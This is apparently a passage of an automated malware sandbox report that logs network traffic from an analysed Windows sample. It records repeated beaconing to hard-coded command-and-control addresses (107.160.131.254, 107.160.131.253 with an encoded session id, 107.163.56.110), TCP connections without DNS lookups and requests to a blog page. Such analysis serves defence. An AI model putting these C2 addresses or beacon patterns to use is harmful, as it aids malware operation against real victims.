Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.253
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.253
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.253
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.253
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.253
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.56.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: unknownTCP traffic detected without corresponding DNS query: 107.160.131.254
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10003F41 InternetReadFile,3_2_10003F41
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET //joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm@ HTTP/1.1User-Agent: Mozilla/4.0 (compatible)Host: 107.160.131.253:18659Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u1129.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.110:18530Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
